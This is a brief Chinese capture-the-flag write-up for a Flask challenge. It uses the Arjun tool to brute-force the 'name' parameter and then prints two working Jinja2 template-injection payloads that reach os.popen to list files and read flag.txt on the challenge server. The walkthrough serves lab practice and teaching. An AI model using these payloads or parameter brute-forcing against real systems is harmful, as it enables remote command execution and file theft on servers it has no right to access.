题目告诉我们了,这题是Flask,很可能考的就是SSTI
我们要先找到参数
工具:GitHub - s0md3v/Arjun: HTTP parameter discovery suite.
pip3 install arjun
py -3 setup.py install
arjun -h #验证安装
爆破参数
arjun -u http://186a2253-4b14-4088-8f7f-4879d8b30673.node4.buuoj.cn:81/ -c 100 -d 5
比较慢,需要等一会
参数是name,读取flag
?name={{%27%27.__class__.__base__.__subclasses__()[222].__init__.__globals__[%22os%22].popen(%27ls%27).read()}}
?name={{%27%27.__class__.__base__.__subclasses__()[222].__init__.__globals__["os"].popen(%27cat%20flag.txt%27).read()}}